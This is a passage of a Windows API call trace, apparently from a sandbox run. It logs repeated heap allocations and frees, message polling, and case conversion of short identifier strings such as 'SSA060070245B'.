HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0164.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0164.509] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0164.509] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0164.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0164.509] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0164.509] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0164.510] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0164.510] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00a0 [0164.510] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0164.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0164.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0164.510] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa718 [0164.510] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0164.510] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0164.510] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0164.510] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0164.510] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0164.510] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0164.510] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00c0 [0164.510] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0164.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0164.510] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00c0 [0164.510] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0164.510] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0164.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0164.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0164.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0164.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0164.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0164.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0164.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0164.511] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0164.511] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0164.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0164.511] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0164.511] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0164.511] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0164.511] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0164.511] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0164.511] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00c0 [0164.511] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0164.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0164.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0164.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0164.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0164.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0164.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0164.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0164.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0164.512] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0164.512] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0164.512] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0164.512] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0164.512] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0164.512] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0164.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0164.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0164.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0164.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0164.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0164.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0164.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0164.512] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0164.512] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0164.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0164.512] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0164.512] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0164.512] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0164.512] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0164.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0164.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0164.513] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa718 [0164.513] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0164.513] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0164.513] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0164.513] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0164.513] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0164.513] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0164.513] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0164.513] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0164.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0164.513] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00b0 [0164.513] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0164.513] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0164.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0164.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0164.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0164.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0164.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0164.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0164.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0164.513] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0164.514] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0164.514] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0164.514] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0164.514] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0164.514] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0164.514] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0164.514] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0164.514] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0164.514] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0164.514] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0164.514] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0164.514] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0164.514] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0164.514] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0164.514] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0164.514] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0164.514] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0164.514] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0164.514] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0164.514] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0164.514] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0164.515] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0164.515] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0164.515] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0164.515] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0164.515] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0164.515] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0164.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0164.515] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0164.515] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0164.515] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0164.515] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0164.515] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0164.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0164.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0164.515] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0164.515] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0164.515] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0164.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d920 [0164.515] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.515] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0164.516] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0164.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0164.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0164.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0164.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0164.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00b0 [0164.516] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0164.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0164.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0164.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa4c0 [0164.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0164.516] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0164.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0164.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00c0 [0164.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0164.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0164.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00d0 [0164.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0164.516] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0164.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0164.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0164.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0164.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0164.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0164.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0164.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0164.517] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0164.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0164.517] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0164.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0164.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0164.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0164.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0164.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0164.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0164.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0164.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0164.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0164.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0164.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0164.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0164.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0164.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0164.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0164.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0164.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0164.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0164.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0164.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0164.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0164.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0164.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0164.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0164.519] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0164.519] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0164.519] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0164.519] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0164.519] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0164.519] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0164.519] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0164.519] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0164.519] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0164.519] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0164.519] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0164.519] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0164.520] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0164.520] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34c2258 | out: hHeap=0x25c0000) returned 1 [0164.520] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0164.520] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0164.520] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0164.520] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0164.520] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0164.520] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0164.520] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0164.520] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0164.520] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0164.520] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0164.520] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0164.520] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0164.520] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0164.520] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0164.520] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0164.520] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0164.520] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0164.520] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: 